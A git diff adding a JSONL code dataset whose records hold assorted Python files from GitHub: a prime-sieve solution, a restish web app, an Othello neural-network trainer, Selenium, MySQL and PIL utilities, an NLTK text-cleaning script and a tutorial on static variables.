diff --git "a/6470.jsonl" "b/6470.jsonl" new file mode 100644--- /dev/null +++ "b/6470.jsonl" @@ -0,0 +1,2053 @@ +{"seq_id":"21596277035","text":"prime = [1]*(3*10**6)\nprime[0] = 0; prime[1] = 0\nprimes = []\nfor n in range(2, len(prime)):\n if prime[n] == 0:\n continue\n for i in range(2*n, len(prime), n):\n prime[i] = 0\n primes.append(n)\n\nT = int(input())\nfor _ in range(T):\n N = int(input())\n ans = None\n for p in primes:\n if N%p==0:\n if N%(p**2) == 0:\n ans = [p, N//p**2]\n else:\n ans = [int((N//p)**0.5), p]\n break\n print(f\"{ans[0]} {ans[1]}\")","repo_name":"Programmerryoki/Competitive-Programming","sub_path":"Atcoder/ABC 284/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"72344361208","text":"from __future__ import with_statement\nimport logging\nimport math\nimport clevercss\nfrom restish import http, resource, templating\nfrom example.lib import base, guard\nimport adminish\nfrom couchish.couchish_formish_jsonbuilder import build\n\nfrom formish.fileresource import FileResource\nfrom formish.filestore import CachedTempFilestore\n\nimport couchish\nfrom couchish.filestore import CouchDBFilestore\n\nfrom operator import itemgetter\n\nlog = logging.getLogger(__name__)\n\n\nclass Root(base.BasePage):\n\n @resource.GET()\n @templating.page('root.html')\n def html(self, request):\n return {}\n\n @resource.child()\n def example(self, request, segments):\n return Example()\n\n @guard.guard(guard.is_admin())\n @resource.child()\n def admin(self, request, segments):\n return adminish.resource.Admin()\n \n @resource.child(resource.any)\n def page(self, request, segments):\n return PageResource(segments), ()\n\n @resource.child('filehandler')\n def filehandler(self, request, segments):\n tempfilestore = CachedTempFilestore(name='tmp')\n cdbfilestore = CouchDBFilestore(request.environ['couchish'], name='cdb')\n return FileResource(filestores=[cdbfilestore, tempfilestore])\n\n #####\n # clevercss\n @resource.child('ccss/{file}')\n def child_ccss(self, request, segments, file=None):\n return lambda request: self.css(request, file=file)\n\n def css(self, request, file):\n if file is None:\n return\n ccss = templating.render(request,'ccss/%s'%file, {})\n css = clevercss.convert(ccss)\n return http.ok([('Content-Type', 'text/css')], css)\n\n @resource.child('ccsss/{file}')\n def child_ccsss(self, request, segments, file=None):\n return lambda request: self.csss(request, file=file)\n\n def csss(self, request, file):\n if file is None:\n return\n ccss = templating.render(request,'ccss/%s'%file, {})\n return http.ok([],ccss)\n\n\nclass Example(base.BasePage):\n\n @resource.GET()\n def GET(self, request):\n \"\"\"\n http://localhost:8080/example?nd=1234901751220&_search=false&rows=10&page=1&sidx=url&sord=desc\n nd\n \"\"\"\n C = request.environ['couchish']\n M = request.environ['adminish']['page']\n T = C.config.types['page']\n try:\n page = int(request.GET.get('page'))\n except ValueError:\n page = 0\n try:\n numrows = int(request.GET.get('rows'))\n except ValueError:\n numrows = 10\n sortkey = request.GET.get('sidx')\n reverse = request.GET.get('sord')\n if reverse == 'asc':\n reverse = False\n else:\n reverse = True\n with C.session() as S:\n items = S.docs_by_type('page')\n items = list(items)\n items = sorted(items, key=itemgetter(sortkey), reverse=reverse)\n\n records = len(items)\n total_pages = int(math.ceil( float(records) / int(numrows) ))\n if page > total_pages:\n page = total_pages\n start = (page-1) * numrows\n end = page * numrows\n results = {'page': int(page), 'total': int(total_pages), 'records': records}\n rows = []\n for item in items[start:end]:\n rows.append( {'id':item['url'], 'cell':[item['url'], item['title']]} )\n\n results['rows'] = rows\n\n return http.ok([('Content-Type','text/javascript'),], couchish.jsonutil.dumps(results) )\n\n \nclass PageResource(base.BasePage):\n\n def __init__(self, segments):\n self.segments = segments\n\n @resource.GET(accept='html')\n @templating.page('page.html')\n def page(self, request):\n url = '/%s'%('/'.join(self.segments))\n C = request.environ['couchish']\n with C.session() as S:\n page = list(S.view('page/by_url',key=url,include_docs=True))\n return {'page': page[0].doc}\n\n\n\n\n","repo_name":"ish/adminish-example","sub_path":"example/resource/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"39052319138","text":"import h5py\nimport struct\n\nclass Order:\n def __init__(self, stk_code, order_id, direction, price, volume, type):\n self.stk_code = stk_code\n self.order_id = order_id\n self.direction = direction\n self.price = price\n self.volume = volume\n self.type = type\n\nclass Trade:\n def __init__(self, stk_code, bid_id, ask_id, price, volume):\n self.stk_code = stk_code\n self.bid_id = bid_id\n self.ask_id = ask_id\n self.price = price\n self.volume = volume\n\n def to_bytes(self):\n return struct.pack(\"=iiidi\", self.stk_code, self.bid_id, self.ask_id, self.price, self.volume)\n'''\ndef read_order_from_file(self, order_id_path, direction_path, price_path, volume_path, type_path):\n order_id_mtx = h5py.File(order_id_path, 'r')['order_id']\n direction_mtx = h5py.File(direction_path, 'r')['direction']\n price_mtx = h5py.File(price_path, 'r')['price']\n volume_mtx = h5py.File(volume_path, 'r')['volume']\n type_mtx = h5py.File(type_path, 'r')['type']\n x = 10\n y = 100\n z = 77\n return Order(x%10 + 1,\n order_id_mtx[x,y,z],\n DirectionType(direction_mtx[x,y,z]),\n price_mtx[x,y,z],\n volume_mtx[x,y,z],\n OrderType(type_mtx[x,y,z]))\n'''\ndef dump_trade(trade_list):\n with open(\"Ans\", 'wb') as f:\n f.write(b''.join(map(lambda x: x.to_bytes(), trade_list)))\n\n","repo_name":"museremarkable/UbiYagami","sub_path":"python/io_example/read_write.py","file_name":"read_write.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"49392130426","text":"#!/usr/bin/python3\nimport mysql.connector\nfrom mysql.connector import Error\n#from metadata_parser import metadata_parser\nimport datetime\nimport os\n\nclass MYSQL_SIM_DATA:\n def __init__(self,debug=0):\n print (\"Constructing....\")\n self.connection=None\n self.DEBUG=debug\n self.ConnectDatabase(os.environ['MYSQL_HOST'],os.environ['DB_NAME'],os.environ['DB_USERNAME'],os.environ['DB_PW'])\n def __del__(self):\n if self.connection is not None:\n self.connection.close()\n print (\"destructing.....\")\n def is_connected(self):\n return self.connection.is_connected()\n def ConnectDatabase(self,h, db, u ,pww):\n #type: (MYSQL_SIM_DATA,str,str,str,str)\n try:\n self.connection = mysql.connector.connect(host=h, database=db,user=u,password=pww)\n if self.is_connected():\n db_Info = self.connection.get_server_info()\n print(\"Connected to MySQL Server version \", db_Info)\n if self.DEBUG>0:\n cursor = self.connection.cursor()\n cursor.execute(\"select database();\")\n# cursor.execute(\"show tables;\")\n record = cursor.fetchone()\n print(\"You're connected to database: \", record)\n cursor.execute(\"show tables;\")\n record=cursor.fetchall()\n for i in range(len(record)):\n print(\"In database are these tables: \", record[i])\n print(\"show columns from \"+''.join(record[i]))\n cursor.execute(\"show columns from \"+''.join(record[i]))\n record2=cursor.fetchall()\n for j in range(len(record2)):\n print(record2[j])\n cursor.close()\n except Error as e:\n print(\"Error while connecting to MySQL\", e)\n sys.exit(1)\n# finally:\n# if (self.connection.is_connected()):\n# cursor.close()\n# self.connection.close()\n# print(\"MySQL connection is closed\")\n def det_data(self,run_file_ID,Run_date,run_number,type_Profile,Run_Start,Run_End,Shifter_ID,Detector_configuuration,Comment):\n #type: (MYSQL_SIM_DATA,str,str,str,str,str,str)\n #print username\n cursor=self.connection.cursor()\n# cursor.execute(\"select database()\")\n now=datetime.datetime.utcnow()\n cursor.execute(\"INSERT INTO det_detdata (run_file_ID,Run_date,run_number,type_Profile,Run_Start,Run_End,Detector_configuration,Comment) VALUES(%s,%s,%s,%s,%s,%s,%s,%s)\",(run_file_ID,Run_date,run_number,type_Profile,Run_Start,Run_End,Detector_configuuration,Comment) )\n \n cursor.execute('SELECT last_insert_id()')\n record = cursor.fetchone()\n# print(\"You're connected to database: \", record)\n self.connection.commit()\n cursor.close()\n return record[0]\n \n def det_runefiles (self,FileID,split_index,filename,Md5sum,filesize,filesid):\n #type: (MYSQL_SIM_DATA,str,str,int,int,str,str,str)\n cursor=self.connection.cursor()\n cursor.execute(\"INSERT INTO det_runfiles ( split_index,filename,Md5sum,filesize,filesID) VALUES(%s,%s,%s,%s,%s)\",( split_index,filename,Md5sum,filesize,filesid))\n cursor.execute('SELECT last_insert_id()')\n record = cursor.fetchone()\n # cursor.execute(\"UPDATE det_data SET run_file_ID=%s where ID=%s\"%(record[0],det_dataID))\n# cursor.execute\n self.connection.commit()\n cursor.close()\n return record[0]\n def det_ccfile (self, run_number,det_detdataID, split_index,Filepath,Filename,Filesize,Md5sum,reco_level,status,creation_data):\n #type:(MYSQL_SIM_DATA,int,int,str,int,int,str,str,str,str)\n cursor=self.connection.cursor()\n cursor.execute(\"INSERT INTO det_ccfile (run_number,det_detdataID, split_index,Filepath,Filename,Filesize,Md5sum,reco_level,status,creation_date) VALUES(%s,%s,%s,%s,%s,%s,%s,%s, %s,%s) \",(run_number,det_detdataID, split_index,Filepath,Filename,Filesize,Md5sum,reco_level,status,creation_data))\n cursor.execute('SELECT last_insert_id()')\n record = cursor.fetchone()\n# cursor.execute(\"UPDATE det_data SET run_file_ID=%s where run_number=%s\"%(record[0],det_dataID))\n # cursor.execute\n self.connection.commit()\n cursor.close()\n return record[0]\n\n\n def det_datatrans (self,trans_time,status ):\n #type:(MYSQL_SIM_DATA,int,int,str,int,int,str,str,str,str)\n cursor=self.connection.cursor()\n cursor.execute(\"INSERT INTO det_filetransfer ( transfer_time, status) VALUES(%s,%s) \",(trans_time,status))\n cursor.execute('SELECT last_insert_id()')\n record = cursor.fetchone()\n# cursor.execute(\"UPDATE det_data SET run_file_ID=%s where run_number=%s\"%(record[0],det_dataID))\n # cursor.execute\n self.connection.commit()\n cursor.close()\n return record[0]\n def det_data_comitioning(self,Run_date,Operators,run_number,duration,triger,description,comment,Detector_sys):\n cursor=self.connection.cursor()\n cursor.execute(\"INSERT INTO det_comitioning_data (Run_date,Operators,run_number,duration,triger,description,comments,Detector_sys) VALUES(%s,%s,%s,%s,%s,%s,%s,%s) \", (Run_date,Operators,run_number,duration,triger,description,comment,Detector_sys))\n self.connection.commit()\n cursor.close()\n\n\n#myconnect=MYSQL_SIM_DATA(0)\n#rec=myconnect.init_prod(\"breier\",\"nieco\",\"nieco\",\"nieco2\",\"nieco3\",\"nieco4\")\n#rec1=myconnect.store_simu(rec,\"cc\",\"/adresa/suboru/\",10000,10,\"hash\",\"5.6.7\",\"comentujem si\")\n#myconnect.store_reco(rec, rec1 ,\"/adresa/recosuboru/\",10000,10,10.6.1,1,,hash,comentujem )\n#:print(\"You're connected to database: \", rec)\n#conf_path=\"../simdata/\"\n#filename=\"output_files.d/file_0.meta\"\n#mp=metadata_parser(0)\n#mp.parse_file(conf_path,filename)\n#print mp.data\n","repo_name":"robobre/SNcopy","sub_path":"database_connector.py","file_name":"database_connector.py","file_ext":"py","file_size_in_byte":6030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3490844558","text":"from django.contrib import admin\nfrom mptt.admin import DraggableMPTTAdmin\nfrom .models import Course, Topics, Links, TopicArticle\nfrom reversion_compare.admin import CompareVersionAdmin\nfrom reversion_compare.mixins import CompareMixin\nfrom django.db.models import Manager\n# Register your models here.\n\n_old_compare = CompareMixin.compare\n\n\ndef compare(self, obj, version1, version2):\n def replace_taggit_field(version_ins):\n for fieldname in version_ins.field_dict:\n if isinstance(version_ins.field_dict[fieldname], Manager):\n version_ins.field_dict[fieldname] = []\n replace_taggit_field(version1)\n replace_taggit_field(version2)\n return _old_compare(self, obj, version1, version2)\n\nCompareMixin.compare = compare\n\nclass TopicArticleAdmin(CompareVersionAdmin):\n pass\n\nadmin.site.register(Course)\nadmin.site.register(Links)\nadmin.site.register(TopicArticle, TopicArticleAdmin)\n\n\n\nadmin.site.register(\n Topics,\n DraggableMPTTAdmin,\n list_display=(\n 'tree_actions',\n 'indented_title',\n # ...more fields if you feel like it...\n ),\n list_display_links=(\n 'indented_title',\n ),\n)\n","repo_name":"fresearchgroup/Collaboration-System","sub_path":"Course/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"77"} +{"seq_id":"14300362082","text":"#\n\nimport re\nimport struct\nimport numpy as np\nimport scipy.sparse as sp\nimport pickle\n\nimport datetime\n\nclass Corpus:\n def __init__(self, voca):\n self.__i2p = []\n self.__p2i = {}\n self.__i2m = []\n self.__voca = voca\n self.__dirty = False\n \n def save(self, paths_file, index_file, matrix_file):\n with open(paths_file, 'wb') as f:\n pickle.dump(self.__i2p, f, protocol=pickle.HIGHEST_PROTOCOL)\n \n with open(index_file, 'wb') as f:\n pickle.dump(self.__i2m, f, protocol=pickle.HIGHEST_PROTOCOL)\n \n with open(matrix_file, 'wb') as f:\n pickle.dump(self.get_matrix(), f, protocol=pickle.HIGHEST_PROTOCOL)\n \n def load(self, paths_file, index_file, matrix_file):\n # print('reading paths.')\n with open(paths_file, 'rb') as f:\n self.__i2p = pickle.load(f)\n self.__p2i = { path: i for i, path in enumerate(self.__i2p) }\n \n # print('reading index.')\n if index_file:\n with open(index_file, 'rb') as f:\n self.__i2m = pickle.load(f)\n else:\n self.__i2m = None\n \n # print('reading matrix.')\n with open(matrix_file, 'rb') as f:\n self.__mat = pickle.load(f)\n # print('done.')\n self.__dirty = False\n \n def add(self, path, words):\n try:\n i = self.__p2i[path]\n except KeyError:\n i = len(self.__i2p)\n self.__i2p.append(path)\n self.__p2i[path] = i\n \n m = { self.__voca.get_no(word) for word in words }\n \n while len(self.__i2m) < i + 1:\n self.__i2m.append(None)\n self.__i2m[i] = m\n \n self.__dirty = True\n\n def remove(self, path):\n try:\n i = self.__p2i[path]\n self.__i2p[i] = None\n del self.__p2i[path]\n self.__i2m[i] = None\n except KeyError:\n pass\n \n self.__dirty = True\n \n def clear(self):\n self.__i2p = None\n self.__p2i = None\n self.__i2m = None\n self.__voca = None\n self.__mat = None\n\n def get_path(self, i):\n return self.__i2p[i]\n \n def get_sub_paths(self, folders):\n return { i for i, p in enumerate(self.__i2p) if p is not None and re.sub(r'/\\d+$', '', p) in folders }\n \n def get_matrix(self):\n if not self.__dirty:\n return self.__mat\n rows = []\n cols = []\n for i, m in enumerate(self.__i2m):\n if m:\n rows += [ i ] * len(m)\n cols += list(m)\n self.__mat = sp.csr_matrix(( [1] * len(cols), ( rows, cols ) ), shape=(len(self.__i2m), self.__voca.size()), dtype=np.int8)\n self.__dirty = False\n return self.__mat\n","repo_name":"masm11/mewgrep","sub_path":"corpus.py","file_name":"corpus.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12940268561","text":"import othelloDriver as OD\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\nfrom torch.nn import functional\nimport random\n\n# The model to be loaded to continue training. Leave this value empty or false to not load any file.\nLOAD_MODEL = \"\" #\"in.pth\"\n\n# The model to save to. Saves happen every 500 episodes. Leave empty or false for no saving.\nSAVE_MODEL = \"\" #\"out.pth\"\n\n# The file to write stats to. Leave empty or false for no saving.\nSTATS_FILE = \"\" # output.txt\n\n# How many episodes to train for\nEPISODE_COUNT = 5000\n\nclass NN(nn.Module): #simple CNN\n def __init__(self):\n super().__init__()\n \n self.C1 = nn.Conv2d(2, 64, 3, padding=1)\n self.C2 = nn.Conv2d(64, 128, 3, padding=1)\n self.P1 = nn.MaxPool2d(2, 2)\n\n self.flatten = nn.Flatten(-3, -1)\n self.linear_relu_stack = nn.Sequential(\n nn.Linear(4*4*128, 256),\n nn.ReLU(),\n nn.Linear(256, 128),\n nn.ReLU(),\n nn.Linear(128, 64), \n nn.Sigmoid(),\n )\n\n def forward(self, x):\n x = functional.relu(self.C1(x))\n x = functional.relu(self.C2(x))\n x = self.P1(x)\n\n x = self.flatten(x)\n\n logits = self.linear_relu_stack(x)\n return logits\n\n\nclass agent:\n \n func = None\n device = None\n opt = None\n lossFunc = None\n\n LR = 0.0001\n PV = 0.9\n GREEDY = 0.1\n\n def __init__(self):\n self.device = (\"cuda\" if torch.cuda.is_available() else \"mps\" if torch.backends.mps.is_available() else \"cpu\")\n print(f\"Using {self.device} device\")\n self.func = NN().to(self.device)\n self.opt = torch.optim.Adam(self.func.parameters(), lr = self.LR)\n\n self.lossFunc = nn.MSELoss()\n\n self.softmaxCache = {}\n\n self.rng64 = [i for i in range(64)]\n\n if LOAD_MODEL:\n self.func.load_state_dict(torch.load(\"1010Human.pth\"))\n\n def scoot(self, brd, tkn, g):\n g = Variable(torch.tensor(g), requires_grad = False).to(self.device)\n \n pred = self.predict(brd, tkn)\n\n loss = self.lossFunc(pred, g)\n\n loss.backward()\n self.opt.step()\n self.opt.zero_grad()\n\n return loss.item()\n \n def constructTensor(self, brd, tkn):\n self.lastBrd = brd #for caching purposes\n self.lastTkn = tkn\n\n # 8 x 8 x 2\n # 1 --> current player's tkns\n # 2 --> opponent's tkns\n opp = 'x' if tkn == 'o' else 'o'\n\n l1 = [[1.0 if brd[i*8+j] == tkn else 0.0 for j in range(8)] for i in range(8)]\n l2 = [[1.0 if brd[i*8+j] == opp else 0.0 for j in range(8)] for i in range(8)]\n\n f = [l1, l2]\n\n f = Variable(torch.tensor(f), requires_grad = True).to(self.device)\n\n return f\n\n\n def predict(self, f):\n pred = self.func(f)\n return pred\n \n def softmax(self, vec):\n if (self.lastBrd, self.lastTkn) in self.softmaxCache:\n return self.softmaxCache[(self.lastBrd, self.lastTkn)]\n sm = sum(vec)\n res = [v/sm for v in vec]\n self.softmaxCache[(self.lastBrd, self.lastTkn)] = res\n return res\n \n def simulateMove(self, brd, tkn, pred=False, egreed=True):\n if pred == False: \n pred = self.predict(self.constructTensor(brd, tkn)).tolist()\n if egreed:\n eps = random.random()\n else:\n eps = 1\n if eps < self.GREEDY:\n #do e-greedy move\n return (random.randint(0, 63), pred)\n else:\n # ^ 64x1 vector, probabilities\n probs = self.softmax(pred)\n return (random.choices([i for i in range(64)], weights=probs)[0], pred)\n\n def simulateMoveTensor(self, f, pred=False):\n if pred == False: \n pred = self.predict(f).tolist()\n\n eps = random.random()\n if eps < self.GREEDY:\n #do e-greedy move\n return (random.randint(0, 63), pred)\n else:\n # ^ 64x1 vector, probabilities\n probs = self.softmax(pred)\n return (random.choices(self.rng64, weights=probs)[0], pred)\n\n\n\ndef train(f, g, agt):\n\n f = f.to(agt.device)\n g = g.to(agt.device)\n\n pred = agt.func(f)\n\n loss = agt.lossFunc(pred, g)\n\n loss.backward()\n agt.opt.step()\n agt.opt.zero_grad()\n\n return loss.item()\n\ndef test(agt):\n brd = '.'*27 + \"ox......xo\" + '.'*27\n tkn = 'x'\n\n goofs = 0\n while True:\n mvs = OD.getPossibleMovesDots(brd, tkn)\n \n if not mvs:\n break\n \n picked, pred = agt.simulateMove(brd, tkn)\n \n #print(picked)\n\n if picked not in mvs:\n goofs += 1\n else:\n brd = OD.playMove(brd, tkn, picked)\n tkn = OD.opponent[tkn]\n\n print(\"Goofs\", goofs)\n\ndef fullTest(agt, iterations):\n agt.func.eval()\n\n roundedError = 0\n squaredError = 0\n randomGoof = 0\n selectionGoof = 0\n totalDepth = 0\n print()\n for trial in range(100):\n brd = '.'*27 + \"ox......xo\" + '.'*27\n tkn = 'x'\n\n while True:\n mvs = OD.getPossibleMovesDots(brd, tkn)\n \n if not mvs:\n totalDepth += 64 - brd.count('.')\n break\n\n agtChoice, pred = agt.simulateMove(brd, tkn, egreed=False)\n\n ans = [1.0 if mv in mvs else 0.0 for mv in range(64)]\n mx, mxInd = -1, -1\n for pos in range(64):\n roundedChoice = round(pred[pos])\n if int(roundedChoice) != int(ans[pos]):\n roundedError += 1\n squaredError += (pred[pos] - ans[pos]) ** 2\n\n if pred[pos] > mx:\n mx = pred[pos]\n mxInd = pos\n \n if int(ans[agtChoice]) != 1:\n randomGoof += 1\n \n if int(ans[mxInd]) != 1:\n selectionGoof += 1\n\n picked = random.choice([*mvs])\n\n brd = OD.playMove(brd, tkn, picked)\n tkn = OD.opponent[tkn]\n \n if trial%5 == 0:\n print('$', end='', flush=True)\n print()\n if outfile:\n outfile.write(f\"Iterations: {iterations}\\n\")\n outfile.write(f\"Rounded Error: {roundedError/100}\\n\")\n outfile.write(f\"MSE Error: {squaredError/100}\\n\")\n outfile.write(f\"Random Goofs: {randomGoof/100}\\n\")\n outfile.write(f\"Selection Goofs: {selectionGoof/100}\\n\")\n outfile.write(f\"Avg Depth: {totalDepth/100}\\n\")\n outfile.flush()\n\n print(f\"Iterations: {iterations}\")\n print(f\"Rounded Error: {roundedError/100}\")\n print(f\"MSE Error: {squaredError/100}\")\n print(f\"Random Goofs: {randomGoof/100}\")\n print(f\"Selection Goofs: {selectionGoof/100}\")\n print(f\"Avg Depth: {totalDepth/100}\")\n\n agt.func.train()\n\ndef simulateEpisode(agt):\n global avgd\n brd = '.'*27 + \"ox......xo\" + '.'*27\n tkn = 'x'\n\n batch = []\n\n depth = 0\n while True:\n depth += 1\n mvs = OD.getPossibleMovesDots(brd, tkn)\n \n if not mvs:\n break\n\n f = agt.constructTensor(brd, tkn)\n picked, pred = agt.simulateMoveTensor(f)\n \n while picked not in mvs: \n if picked != -1:\n pred[picked] = 0\n picked, __ = agt.simulateMoveTensor(f, pred=pred)\n\n \n pred[picked] = 1\n\n batch.append((f, pred))\n\n brd = OD.playMove(brd, tkn, picked)\n tkn = OD.opponent[tkn]\n \n avgd += depth\n\n f, g = [], []\n for tpl in batch:\n fe, ans = tpl\n f.append(fe)\n g.append(ans)\n\n f = torch.stack(f, 0)\n g = Variable(torch.tensor(g), requires_grad = False)\n\n lss = train(f, g, agt)\n \nif __name__ == \"__main__\":\n global outfile\n if STATS_FILE:\n outfile = open(STATS_FILE, 'w')\n else:\n outfile = False\n\n global avgd\n avgd = 0\n agt = agent()\n OD.setGlobals()\n\n for i in range(EPISODE_COUNT + 1):\n if i%500 == 0:\n if SAVE_MODEL:\n torch.save(agt.func.state_dict(), SAVE_MODEL)\n if i%1000 == 0:\n fullTest(agt, i)\n if i%10 == 0:\n print(f\"*\", end=\"\", flush=True)\n simulateEpisode(agt)\n\n\n\n\n","repo_name":"ChiMasterBing/Offline-Model-Learning","sub_path":"onlineLearning.py","file_name":"onlineLearning.py","file_ext":"py","file_size_in_byte":8272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21763702632","text":"from selenium.webdriver.support.ui import Select\nfrom selenium import webdriver\nimport math\nimport os\nimport time\n\n\ndef calc(x):\n return str(math.log(abs(12 * math.sin(int(x)))))\n\n\nif __name__ == '__main__':\n try:\n page_url = 'http://suninjuly.github.io/file_input.html'\n\n browser = webdriver.Chrome()\n browser.get(page_url)\n\n elements = browser.find_elements_by_css_selector('.form-group > input')\n for element in elements:\n element.send_keys('Answer')\n\n upload_file = browser.find_element_by_id('file')\n\n curr_dir = os.path.abspath(os.path.dirname(__file__))\n file_path = os.path.join(curr_dir, 'input.txt')\n upload_file.send_keys(file_path)\n\n btn = browser.find_element_by_class_name('btn')\n btn.click()\n\n except Exception as e:\n print(e)\n finally:\n time.sleep(15)\n browser.quit()\n","repo_name":"Jeniamakarchik/selenium_course","sub_path":"week2/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6311113188","text":"# @Time : 2022/10/26 14:22 \n# @Author : CaoXiang\n# @Description: 画图相关功能 比如标记目标框、标记类别、人物名称等等\nimport numpy as np\nfrom PIL import Image, ImageDraw, ImageFont\nimport typing\nimport matplotlib.pyplot as plt\n\ndef draw_box(arr: np.ndarray, cords: typing.List[int], color: typing.Tuple[int, int, int],\n thickness: int) -> np.ndarray:\n \"\"\"\n 在原图上绘制出矩形框\n :param arr: 传入的原图ndarray\n :param cords: 框的坐标,按照【xmin,ymin,xmax,ymax】的方式进行组织\n :param color: 框的颜色\n :param thickness: 框线的宽度\n :return: 绘制好框后的图像仍然按照ndarray的数据格式s\n \"\"\"\n assert len(cords) == 4, \"cords must have 4 elements as xmin ymin xmax ymax.\"\n assert isinstance(arr, np.ndarray), \"input must be type of numpy ndarray.\"\n img = Image.fromarray(arr)\n draw = ImageDraw.Draw(img)\n draw.rectangle(xy=cords, outline=color, width=thickness)\n img = np.array(img)\n return img\n\n\ndef draw_text(arr: np.ndarray, cords: typing.List[int], text:str, color:typing.Tuple[int, int, int],\n thickness: int) -> np.ndarray:\n \"\"\"\n 在原图上绘制文字类的信息\n :param arr: 传入的原图ndarray\n :param cords: 框的坐标,按照【xmin,ymin,xmax,ymax】的方式进行组织\n :param text: 需要打印的文字\n :param color: 框的颜色\n :param thickness: 框线的宽度\n :return: 绘制好框后的图像仍然按照ndarray的数据格式\n \"\"\"\n assert len(cords) == 2, \"cords must have 2 elements as xmin ymin.\"\n assert isinstance(arr, np.ndarray), \"input must be type of numpy ndarray.\"\n img = Image.fromarray(arr)\n draw = ImageDraw.Draw(img)\n draw.text(xy=cords, fill=color, width=thickness, text=text)\n img = np.array(img)\n return img\n\n\nif __name__ == '__main__':\n arr = np.ones((124, 124, 3)).astype(np.uint8) * 255\n arr = draw_box(arr, cords=[10, 10, 30, 30], color=(255, 0, 0), thickness=2)\n arr = draw_text(arr, cords=[50, 50], color=(0, 255, 0), thickness=2, text=\"Hello!\")\n plt.figure()\n plt.imshow(arr)\n plt.show()\n\n\n","repo_name":"AdamMayor2018/VideoAudition","sub_path":"tools/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"1118555085","text":"import argparse\nimport logging\nimport pandas as pd\nimport hashlib\nfrom urllib.parse import urlparse\nimport nltk\nfrom nltk.corpus import stopwords\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nstop_words = set(stopwords.words('spanish'))\n\n\ndef main(filename):\n logger.info('Starting the cleaning process')\n\n df = _read_data(filename)\n\n site_id = _extract_site_id(filename)\n df = _add_column(df, 'site_id', site_id)\n df = _extract_host(df)\n df = _fill_missing_titles(df)\n df = _set_rows_uids(df)\n df = _remove_escape_chars(df)\n df = _tokenize_column(df, 'title')\n df = _tokenize_column(df, 'body')\n df = _remove_duplicates(df, 'title')\n df = _remove_duplicates(df, 'url')\n df = _drop_rows_with_missing_data(df)\n\n _save_data(df, filename)\n\n return df\n\n\ndef _read_data(filename):\n logger.info('Reading file {}'.format(filename))\n return pd.read_csv(filename)\n\n\ndef _extract_site_id(filename):\n logger.info('Extracting site id')\n site_id = filename.split('-')[0]\n logger.info('Site id {}'.format(site_id))\n return site_id\n\n\ndef _add_column(df, name, value):\n logger.info('Adding column {}, with value {}'.format(name, value))\n df[name] = value\n return df\n\n\ndef _extract_host(df):\n logger.info('Extracting urls host')\n df['host'] = df['url'].apply(lambda url: urlparse(url).netloc)\n return df\n\n\ndef _fill_missing_titles(df):\n logger.info('Filling missing titles')\n missing_titles_mask = df['title'].isna()\n missing_titles = df[missing_titles_mask]['url'].str.extract(\n r'(?P[^/]+)$').applymap(lambda title: title.replace('-', ' '))\n df.loc[missing_titles_mask, 'title'] = missing_titles.loc[:, 'missing_titles']\n return df\n\n\ndef _set_rows_uids(df):\n logger.info('Setting rows uids')\n uids = df.apply(lambda row: hashlib.md5(\n bytes(row['url'].encode())).hexdigest(), axis=1)\n df['uid'] = uids\n df.set_index('uid', inplace=True)\n return df\n\n\ndef _remove_escape_chars(df):\n logger.info('Removing escape characters from body')\n stripped_body = df.apply(lambda row: row['body'].replace(\n '\\n', '').replace('\\r', ''), axis=1)\n df['body'] = stripped_body\n return df\n\n\ndef _tokenize_column(df, column_name):\n logger.info('Tokenizing {} column'.format(column_name))\n tokenized = (df.apply(lambda row: nltk.word_tokenize(row[column_name]), axis=1)\n .apply(lambda tokens: list(filter(lambda token: token.isalpha(), tokens)))\n .apply(lambda tokens: list(map(lambda token: token.lower(), tokens)))\n .apply(lambda words_list: len(list(filter(lambda word: word not in stop_words, words_list)))))\n\n df['n_tokens_{}'.format(column_name)] = tokenized\n return df\n\n\ndef _remove_duplicates(df, column_name):\n logger.info('Removing duplicate entries from {} column'.format(column_name))\n df.drop_duplicates(subset=[column_name], keep='first', inplace=True)\n return df\n\n\ndef _drop_rows_with_missing_data(df):\n logger.info('Removing rows with missing data')\n return df.dropna()\n\n\ndef _save_data(df, filename):\n clean_filename = 'clean-{}'.format(filename)\n logger.info('Exporting datafram to {}'.format(clean_filename))\n df.to_csv(clean_filename)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('filename', help=\"The path to the raw data\", type=str)\n\n args = parser.parse_args()\n\n df = main(args.filename)\n\n print(df)\n","repo_name":"nicolaslazzos/basic-web-scraper","sub_path":"transform/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73039088888","text":"\n# VArious places to declare static Variables\nclass Test:\n a=10\n def __init__(self):\n Test.b=20\n\n def m1(self):\n Test.c=30\n\n @classmethod\n def m2(cls):\n cls.d1=40\n Test.d2=400\n\n @staticmethod\n def m3():\n Test.e=50\n\n\nprint(Test.__dict__)\n\nt=Test()\n\nprint(Test.__dict__)\n\nt.m1()\nprint(Test.__dict__)\n\nTest.m2()\nprint(Test.__dict__)\n\nTest.m3()\nprint(Test.__dict__)\n\nTest.f=60\nprint(Test.__dict__)\n\n\n# acces Static 